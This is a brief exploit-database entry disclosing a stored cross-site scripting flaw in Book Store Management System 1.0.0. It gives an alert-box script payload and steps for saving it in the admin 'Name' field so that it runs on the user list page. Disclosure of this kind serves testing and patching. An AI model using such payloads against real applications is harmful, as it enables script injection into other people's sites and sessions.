id: 38368
date: 03/29/2023
title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting Vulnerability
author: Rajeshwar Singh
cves: 

# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Rajeshwar Singh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip
# Tested on: Windows/XAMPP
###########################################################################

Payload use = "><script>alert("XSS")</script>

1. Visit URL http://localhost/bsms_ci/
2. login with admin Credentials 
3. navigate to user Management
4. Click on "Add New System User"
5. Add  payload in "Name" input field 
6. Click save.
7. Visit http://localhost/bsms_ci/index.php/user
8. XSS payload execute.

#  0day.today [2023-04-03]  #